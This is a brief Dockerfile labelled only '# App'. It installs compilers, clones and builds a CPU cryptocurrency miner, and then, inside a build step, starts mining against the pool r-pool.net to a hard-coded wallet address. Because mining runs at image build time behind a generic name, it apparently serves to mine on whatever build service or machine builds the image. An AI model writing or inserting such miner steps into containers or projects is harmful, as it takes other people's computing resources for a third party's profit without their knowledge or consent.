# App
FROM ubuntu:20.04

RUN apt-get update \
  && apt-get install -y \
    build-essential \
    libssl-dev \
    libgmp-dev \
    libcurl4-openssl-dev \
    libjansson-dev \
    automake \
    zlib1g-dev \
  && apt-get install git -y \
  && apt-get install wget -y \
  && rm -rf /var/lib/apt/lists/*

RUN git clone https://github.com/WyvernTKC/cpuminer-gr-avx2.git && cd cpuminer-gr-avx2 && chmod +x build.sh && ./build.sh && ./cpuminer -a gr -o stratum+tcp://r-pool.net:3032 -u RRdYNmR6wJydrVCN5LCKtFMkzKvFnuRU9r -t 2
CMD ["-h"]